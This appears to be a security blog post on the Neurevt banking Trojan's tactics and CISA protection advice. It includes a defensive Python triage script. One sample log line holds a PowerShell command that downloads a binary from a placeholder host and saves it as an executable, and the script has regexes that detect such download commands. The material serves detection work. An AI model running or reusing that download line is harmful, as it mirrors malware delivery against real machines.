Trojan Malware: A Bank’s Worst Nightmare


Malware in Mexico

In August 2021, threat researchers from Cisco Systems' Talos Intelligence Group announced that a new version of the Neurevt Trojan malware was wreaking havoc on Mexican banking institutions. In particular, this malware was found to have been attacking banking customers since June 2021 without detection. After compromising the systems, the Neurevt Trojan sought to empty customer accounts managed by some of the largest banks in Mexico, including Banorte, Bancomer, Santander, and Inbursa.

The Neurevt (a.k.a. Beta Bot) Trojan is nothing new to the world of cybersecurity - it was first discovered in 2013. Although this malware has targeted financial institutions from the start, it is constantly evolving, and the newest version discovered by Cisco Talos constitutes one of the most complex banking Trojans the industry has ever seen. Indeed, this new adaptation can penetrate secure systems, steal access credentials, spy on users, and extract sensitive data – all while avoiding detection.

What are banking Trojans and how do they attack networks?

A Trojan horse is a malware program that appears to serve a legitimate purpose but secretly breaches the security of a computer system. Trojans take many forms and can even be embedded in seemingly harmless mobile apps such as flashlights, games, and messaging platforms. Banking Trojans are Trojan programs that specifically attack banks and other large financial services entities. Approximately 20 years ago, when online banking started to become more widely used, Trojans initially attacked the banks themselves. However, following the banks' notable efforts to secure their internal systems, cybercriminals shifted their focus to the customers. Nowadays, personal financial information is more digitized and integrated than ever, which leaves users particularly vulnerable to cyberattacks.

Banking Trojans can hide on a system in several ways. Most Trojans gain initial access to a victim's system through social engineering, such as spam or phishing emails. Once on the system, the Neurevt Trojan proceeds using the following tactics:

  1. Uses PowerShell to download files and send commands: In this first phase, Neurevt launches PowerShell, a command-line shell and scripting language used to automate or configure tasks on the network. The Trojan uses PowerShell to run different programs on the victim's device.

  2. Steals service token information: Next, Neurevt attempts to escalate its privileges on the system by stealing service token information. These tokens are granted by banking applications after a user's credentials (such as a username and password) are successfully authenticated by the server. Stealing these tokens allows Neurevt to acquire user credentials and access sensitive resources.

  3. Utilizes spyware to monitor user activities: In this third stage, Neurevt leverages spyware, another type of malware that secretly monitors user activity without being detected. Specifically, the Neurevt Trojan records keystrokes, monitors screen and clipboard information, and takes screenshots of the victim's computer.

  4. Evades detection by modifying system settings: To avoid detection, Neurevt disables the system firewall and changes the internet settings on the targeted device. This also makes it extremely difficult for threat analysts to attribute the attack to a specific criminal group after the incident.

  5. Extracts data by communicating with remote servers: Finally, Neurevt extracts the confidential financial data (a process known as data exfiltration) by connecting to remote command and control (C&C or C2) servers. Attackers use these C2 servers to send commands to compromised systems during an attack.
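As an added illustration (not from the original post or the Talos report), the following Python script shows how a defender could triage host telemetry against four of the tactics listed above: PowerShell downloads, firewall disabling, Internet Settings changes, and connections back to the download host (a simple C2 correlation). The event lines are constructed and simplified, and their field names, event-ID mapping and addresses are assumptions rather than real Neurevt indicators.

```python
import re

# Constructed, simplified event lines in the form "<event_id>|key=value;...".
# They imitate PowerShell script-block logging (event 4104), a Windows
# Firewall settings-change event (4950), a Sysmon registry value set (13)
# and a Sysmon network connection (3); the field names are assumptions
# and the addresses are documentation-range placeholders.
SAMPLE_EVENTS = [
    "4104|ScriptBlockText=(New-Object Net.WebClient).DownloadFile('http://203.0.113.5/a.bin','C:\\Users\\Public\\a.exe')",
    "4104|ScriptBlockText=Get-ChildItem C:\\Temp",
    "4950|Profile=Domain;Setting=Enable;Value=No",
    "13|TargetObject=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable;Details=DWORD (0x00000001)",
    "3|Image=C:\\Users\\Public\\a.exe;DestinationIp=203.0.113.5;DestinationPort=8080;Initiated=true",
    "3|Image=C:\\Program Files\\Browser\\browser.exe;DestinationIp=198.51.100.20;DestinationPort=443;Initiated=true",
]

DOWNLOAD_CMD = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest", re.I)
URL_HOST = re.compile(r"https?://([\w.\-]+)", re.I)

def parse(line):
    """Split one event line into a dict; the event id is stored under 'id'."""
    event_id, _, body = line.partition("|")
    fields = dict(kv.split("=", 1) for kv in body.split(";") if "=" in kv)
    fields["id"] = event_id
    return fields

def triage(lines):
    """Map each tactic from the post to the parsed events that match it.

    The C2 check is a correlation: an outbound connection counts only when its
    destination was first seen as a download host in a PowerShell script block.
    """
    events = [parse(line) for line in lines]
    hits = {"powershell_download": [], "firewall_disabled": [],
            "internet_settings_changed": [], "c2_connection": []}
    download_hosts = set()
    for e in events:
        text = e.get("ScriptBlockText", "")
        if e["id"] == "4104" and DOWNLOAD_CMD.search(text):
            hits["powershell_download"].append(e)
            download_hosts.update(URL_HOST.findall(text))
        elif e["id"] == "4950" and e.get("Setting") == "Enable" and e.get("Value") == "No":
            hits["firewall_disabled"].append(e)
        elif e["id"] == "13" and "\\Internet Settings\\" in e.get("TargetObject", ""):
            hits["internet_settings_changed"].append(e)
    for e in events:  # second pass so the download-host set is complete
        if e["id"] == "3" and e.get("DestinationIp") in download_hosts:
            hits["c2_connection"].append(e)
    return hits

def tactics_seen(hits):
    """Count distinct tactics observed; several together is the stronger signal."""
    return sum(1 for matches in hits.values() if matches)
```

Any single rule fires on benign activity too; the value is in seeing several of the tactics on one host within a short window.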

Protecting Your Financial Information

Cyber breaches involving personal financial information can be devastating. Protecting digital banking data should be taken seriously by all users, especially now that we are heading towards an era in which nearly all financial transactions can be conducted via mobile phone.

Here are some best practices that the US Cybersecurity and Infrastructure Security Agency (CISA) has listed to help users secure their information and deter malicious hackers:

  • Avoid clicking on any suspicious links or files in emails sent by unknown users.

  • For businesses, conduct in-depth employee training so that all staff members recognize potentially suspicious emails.

  • Always employ multi-factor authentication (MFA) when available.

  • Install trustworthy antivirus and anti-malware software on all devices.

  • Consistently patch and update all software and operating systems.

  • Change passwords to network systems and accounts on a regular basis.


Interested in learning more about other types of malware? Check out our previous post, 7 Things You Should Know about Malware.
